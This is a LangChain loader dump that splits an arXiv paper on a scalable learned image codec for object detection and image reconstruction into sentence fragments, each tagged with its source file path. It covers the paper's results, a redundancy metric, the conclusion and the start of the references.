+ page_content='1 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
189
+ page_content='2 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
190
+ page_content='3 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
191
+ page_content='4 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
192
+ page_content='5 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
193
+ page_content='6 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
194
+ page_content='7 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
195
+ page_content='8 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
196
+ page_content='9 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
197
+ page_content='0 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
198
+ page_content='1 Bits per pixel (bpp) 30 31 32 33 34 35 36 PSNR (RGB) (b) 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
199
+ page_content='1 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
200
+ page_content='2 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
201
+ page_content='3 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
202
+ page_content='4 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
203
+ page_content='5 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
204
+ page_content='6 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
205
+ page_content='7 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
206
+ page_content='8 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
207
+ page_content='9 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
208
+ page_content='0 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
209
+ page_content='1 Bits per pixel (bpp) 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
210
+ page_content='955 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
211
+ page_content='960 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
212
+ page_content='965 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
213
+ page_content='970 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
214
+ page_content='975 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
215
+ page_content='980 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
216
+ page_content='985 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
217
+ page_content='990 MS-SSIM (RGB) (c) Figure 4: Performance comparisons across various metrics.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
218
+ page_content=' (a) Object detection in terms of mAP (IoU=0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
219
+ page_content='5) vs.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
220
+ page_content=' bpp on the COCO 2014 validation dataset.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
221
+ page_content=' (b) Input reconstruction in terms of PSNR vs.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
222
+ page_content=' bpp and (c) input reconstruction in terms of MS-SSIM vs.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
223
+ page_content=' bpp on the Kodak dataset.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
224
+ page_content=' reference implementations of HEVC1 and VVC2 over the quantization parameters QP ∈ {22, 25, 28, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
225
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
226
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
227
+ page_content=' , 40}.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
228
+ page_content=' We evaluate object detection performance on COCO 2014 validation dataset [20] consisting of around 5000 JPEG-compressed images with annotated bounding boxes belonging to 80 object categories.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
229
+ page_content=' We resize the input images to 512 × 512 with a bilinear interpolation filter before encoding.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
230
+ page_content=' Additionally, we also evaluate input reconstruction performance on all 24 images from the Kodak dataset [21].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
231
+ page_content=' 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
232
+ page_content='2 Results Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
233
+ page_content=' 4 compares the performance of our models and relevant codecs.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
234
+ page_content=' Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
235
+ page_content=' 4(a) shows the object detection performance using a rate-accuracy curve in terms of mean average precision (mAP) for an Intersection over Union (IoU) threshold of 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
236
+ page_content='5 versus bits per pixel (bpp).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
237
+ page_content=' Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
238
+ page_content=' 4(b) and (c) show the input reconstruction performance using rate- distortion curves in terms of peak signal-to-noise ratio (PSNR) and MS-SSIM versus bpp, respectively.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
239
+ page_content=' For the primary machine vision task, the object detection performance of our method with (64, 128, 1) reaches near 2% mAP loss3 (dashed line) at around 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
240
+ page_content='3 bpp, whereas Choi et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
241
+ page_content=' [11] with a configuration of (128, 64, 1) reaches a similar accuracy at around 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
242
+ page_content='58 bpp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
243
+ page_content=' When repurposed for this compression task, HEVC and VVC show relatively poor performance.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
244
+ page_content=' In comparison with [11], our method approximately achieves 55% bit savings at the 2% mAP loss threshold.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
245
+ page_content=' For the secondary input reconstruction task, VVC achieves the best performance among all methods for both the PSNR and MS-SSIM metrics.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
246
+ page_content=' However, our method still shows competitive performance at low bpp compared to HEVC and Choi et 1http://hevc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
247
+ page_content='hhi.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
248
+ page_content='fraunhofer.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
249
+ page_content='de/svn/svn_HEVCSoftware/tags/HM-16.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
250
+ page_content='20+SCM-8.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
251
+ page_content='8/ 2https://vcgit.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
252
+ page_content='hhi.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
253
+ page_content='fraunhofer.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
254
+ page_content='de/jvet/VVCSoftware_VTM/-/tags/VTM-12.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
255
+ page_content='3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
256
+ page_content=' 3Default performance of YOLOv3 on COCO2014 dataset, including JPEG-compressed images, is around 55.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
257
+ page_content='85% mAP at 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
258
+ page_content='80 bpp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
259
+ page_content=' 0 20 40 60 80 Epochs 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
260
+ page_content='0 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
261
+ page_content='5 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
262
+ page_content='0 � Rdn (y1 | y2) Ours (64,192,2) Choi et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
263
+ page_content=' [11] (128,64,1) (a) 0 20 40 60 80 Epochs 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
264
+ page_content='0 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
265
+ page_content='5 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
266
+ page_content='0 � Rdn (y2 | y1) (b) Figure 5: Evolution during training of the redundancy metrics (a) � Rdn (y1 | y2) and (b) � Rdn (y2 | y1) discussed in Sec.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
267
+ page_content=' 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
268
+ page_content=' Both curves in all figures correspond to the models trained with λ = 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
269
+ page_content='0483.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
270
+ page_content=' (a) y2 y1 y2 y1 −40 −20 0 20 40 Ours [11] (b) Figure 6: (a) A sample input image from Kodak [21] and (b) top-8 latent channels ordered by rate for the base (y1) and enhancement (y2) latent representations of the models employed in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
271
+ page_content=' 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
272
+ page_content=' al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
273
+ page_content=' [11].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
274
+ page_content=' Nonetheless, the performance gap between our method for well-chosen con- figurations and the benchmarks increases somewhat for larger bpp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
275
+ page_content=' The best con- figuration for our method in terms of PSNR is with M2 = 192 channels for the enhancement layer.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
276
+ page_content=' When comparing input reconstruction performance using MS- SSIM, all tested configurations of our method show competitive performance with respect to HEVC.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
277
+ page_content=' We note that our worst-performing configuration (M2 = 64) in terms of PSNR is still competitive when measured with MS-SSIM.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
278
+ page_content=' In summary, our proposed approach is capable of achieving a significant reduction in bit rate for the object detection task at the cost of slight performance degradation for the input reconstruction task.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
279
+ page_content=' 5 Insight into Information Flow We introduce the redundancy metric Rdn (yi | yj) ≜ I(yi;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
280
+ page_content='yj) H(yi) = 1 − H(yi|yj) H(yi) , also referred to as the uncertainty coefficient [22] in the literature, which measures what portion of the information within yi is redundantly contained in the other variable yj.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
281
+ page_content=' Following the conditional entropy estimation approach employed in [11], we separate yi and yj into fibers with a size of m × 1 × 1, where m ∈ {Mi, Mj} is the number of channels of the respective latent tensor.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
282
+ page_content=' Then, we group the fibers for yj into K = 128 clusters using the k-means algorithm.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
283
+ page_content=' Finally, we estimate � Rdn (yi | yj) = 1 − 1 H(yi) � k∈{1,.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
284
+ page_content='..' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
285
+ page_content=',K} p(k) H(¯yi | c(¯yj) = k), (3) where c : RMj×1×1 → {1, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
286
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
287
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
288
+ page_content=' , K} is a fixed clustering function, p(k) denotes the ap- proximate probability density associated with each cluster k, and (¯yi, ¯yj) is a random H11Hvariable representing one of L pairs of fibers sampled over 256 images.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
289
+ page_content=' To estimate H(yi), we employ the entropy bottleneck module of [3], and also use it in computing the estimate H(¯yi | c(¯yj) = k) ≈ � l∈{1,.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
290
+ page_content='..' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
291
+ page_content=',L} H(¯y(l) i ) δ[c(¯y(l) j ) − k].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
292
+ page_content=' We compare the evolution of the aforementioned metric during training for our method and for the benchmark model [11].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
293
+ page_content=' As Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
294
+ page_content=' 5(a) shows, � Rdn (y1 | y2) sta- bilizes near the desired value of zero for our method, whereas it is larger for [11].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
295
+ page_content=' Conversely, as Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
296
+ page_content=' 5(b) shows, � Rdn (y2 | y1) stabilizes near one for our method, and zero for [11].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
297
+ page_content=' This confirms that our proposed approach yields a more compact base latent representation, while producing a suboptimal enhancement latent repre- sentation.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
298
+ page_content=' Furthermore, it affirms that the model from [11] offers a more graceful degradation in the context of image reconstruction quality as its enhancement latent representation contains less redundancy compared to ours.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
299
+ page_content=' Although the loss in cod- ing efficiency due to scalability has been previously studied in [11], we argue that our way of looking into information flow through an information-theoretic lens provides deeper understanding about degree of redundancy between the latent representations.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
300
+ page_content=' Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
301
+ page_content=' 6 visualizes the top-8 channels, ordered by rate, of the base and enhancement latent representations for both our method and the one in [11].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
302
+ page_content=' For our approach, y1 contains very little visible image structure, suggesting that it is well optimized for the object detection task.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
303
+ page_content=' Without achieving comparative gains in task accuracy, as seen in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
304
+ page_content=' 4, [11] produces significant visible image structure within y1, leading to a significantly higher bit cost for the base bitstream.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
305
+ page_content=' Thus, our method efficiently encodes only what is necessary for a given task within its respective bitstream.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
306
+ page_content=' 6 Conclusion This paper presents a DNN-based image codec with a new variational formulation, offering latent-space scalability for human and machine vision tasks by disentangling the learned latent representations.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
307
+ page_content=' For this end, the information related to the object detection task is extracted at the encoder side to be used as an additional input, together with original input image, to a learned transform at the encoder.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
308
+ page_content=' As such, compared to the state-of-the-art benchmark in [11], we achieve significant bit re- ductions at the base layer bitstream for the object detection task, hence yielding a desirable scalable image codec for the VCM paradigm.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
309
+ page_content=' Additionally, we introduce an information-theoretic metric to analyze the characteristics of the amount of redun- dancy between two learned latent representations.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
310
+ page_content=' We leave the investigation of how to further improve image reconstruction quality while not compromising the object detection performance for future work.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
311
+ page_content=' References [1] “Cisco annual internet report (2018-2023) White paper,” https://www.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
312
+ page_content=' cisco.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
313
+ page_content='com/c/en/us/solutions/collateral/executive-perspectives/ annual-internet-report/white-paper-c11-741490.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
314
+ page_content='html.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
315
+ page_content=' [2] Int.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
316
+ page_content=' Standards Org.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
317
+ page_content='/Int/Electrotech.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
318
+ page_content=' Commun.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
319
+ page_content=', “Call for Proposals on Video Coding for Machines,” ISO/IEC JTC 1/SC 29/WG 2/N220, July 2022.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
320
+ page_content=' [3] J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
321
+ page_content=' Ball´e, D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
322
+ page_content=' Minnen, S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
323
+ page_content=' Singh, S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
324
+ page_content=' J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
325
+ page_content=' Hwang, and N.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
326
+ page_content=' Johnston, “Variational image compression with a scale hyperprior,” in Proc.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
327
+ page_content=' ICLR, 2018.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
328
+ page_content=' [4] Z.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
329
